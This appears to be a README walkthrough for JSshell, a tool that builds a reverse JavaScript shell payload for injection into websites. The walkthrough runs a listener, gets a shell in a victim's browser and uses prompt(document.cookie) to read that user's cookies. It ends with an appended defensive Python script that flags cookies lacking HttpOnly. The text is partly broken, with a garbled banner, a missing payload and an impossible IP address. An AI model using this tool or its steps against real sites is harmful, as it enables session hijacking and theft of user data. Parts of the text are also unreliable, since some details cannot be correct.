Updated in the new version of JSshell 3.1:
>>> snippet Use CTRL+D to finish the snippet
jsh.py -p 1234
jsh.py -s 48.586.1.23 -g
jsh.py -c "alert(document.cookie)" -w 10
This is a step-by-step example for how to use JSshell.
First we will generate a reverse JS shell payload and set the shell timeout to 20 seconds:
~# whoami
root
~# ls
README.md jsh.py
~# python3 jsh.py -g -w 20
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload into the website (or URL):
Access the page, and we will see that we have got the reverse JS shell:
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Now let's execute some commands:
$ var test = 'controlled'
$ alert(test)
$
And the browser got an alert:
$ prompt(document.cookie)
$
And the browser prints the user's cookies:
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#
And we quit!
This is created by shelld3v!
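The `prompt(document.cookie)` step in the walkthrough only returns cookies that were set without the `HttpOnly` attribute. As an added example (not part of JSshell or the original page), the check below lists which cookies from a set of `Set-Cookie` response headers would be exposed that way; the function names and sample headers are constructed for illustration.

```python
# Added example: find cookies that page script can read via document.cookie.
# Function names and SAMPLE_HEADERS are constructed, not taken from JSshell.

def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, value, attrs)."""
    parts = [p.strip() for p in header.split(";")]
    # Only the first "=" separates name from value; values may contain "=".
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()  # attribute names are case-insensitive
    return name.strip(), value.strip(), attrs


def is_deletion(attrs):
    """Max-Age <= 0 tells the browser to drop the cookie, so nothing is exposed."""
    try:
        return int(attrs.get("max-age", "1")) <= 0
    except ValueError:
        return False


def script_readable(headers):
    """Return the names of cookies that document.cookie would expose."""
    exposed = []
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if is_deletion(attrs):
            continue
        if "httponly" not in attrs:
            exposed.append(name)
    return exposed


# Constructed sample Set-Cookie header values
SAMPLE_HEADERS = [
    "session=abc123; Path=/; Secure; HttpOnly",
    "theme=dark; Path=/",
    "csrf=x=y; secure; SameSite=Strict",
    "tracking=; Max-Age=0; Path=/",
    "auth=tok; HTTPONLY",
]

if __name__ == "__main__":
    print("Readable via document.cookie:", script_readable(SAMPLE_HEADERS))
```

`HttpOnly` only keeps the cookie out of `document.cookie`; the injected script still runs in the page, so output encoding and a Content-Security-Policy remain the primary controls.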